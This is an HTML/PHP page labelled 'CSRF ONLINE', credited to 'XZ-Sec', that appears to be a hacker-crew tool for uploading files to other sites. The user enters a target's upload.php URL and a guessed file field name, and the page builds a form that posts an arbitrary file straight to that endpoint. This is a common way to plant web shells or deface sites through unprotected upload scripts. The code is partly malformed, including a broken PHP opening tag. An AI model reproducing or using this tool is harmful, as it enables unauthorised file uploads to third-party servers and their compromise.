csrf

<html><pre><head>
<title>CSRF</title>
<style>body{color:#fff;margin-top:50;margin:50 auto;font-family:'Jolly Lodger',cursive;background-image:url('https://images2.alphacoders.com/483/thumb-1920-483179.jpg');background-position:center;background-size:100%;background-repeat:no-repeat;background-attachment:fixed;background-size:cover;text-align:center;}.defacedby{font-family:Jolly Lodger;text-align:center;color:#fff;font-weight:bold;font-size:80px;text-shadow:0 0 10px #202020,0 0 20px #202020,0 0 40px #FF0000,0 0 60px #FF0000,0 0 90px #FF0000,0 0 5px #FF0000;}a{color:#fff;text-decoration:none;}a:hover{color:#fff;text-shadow:0px 0px 10px #3399ff,0px 0px 20px #3399ff;;}input,select,textarea{border:1px #000000 solid;-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px;}</style>
</head>
<iframe width="1" height="1" src="https://www.youtube.com/embed/WZt7YEuLQ1U?rel=0&autoplay=1" frameborder="0" allowfullscreen></iframe>
<body>
    <center>
<body bgcolor="white">
<font size="6" color="#A50604" face="Orbitron" style="text-shadow:1px 0px 5px blue;">CSRF ONLINE</font>
<br>
<br>
<br>
<font color=Lavenda>*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc
<form method="post">
URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat Diatas^" style="margin: 5px auto; padding-left: 5px;" required><br>
<input type="submit" name="d" value="Lock!!">
</form>
<php
$url = $_POST['url'];
$pf = $_POST['pf'];
$d = $_POST['d'];
if($d) {
    echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload'></form";
}
?>
</form>
</html>
<pre><center>Copyright @ 2018 - XZ-Sec</font></a></center>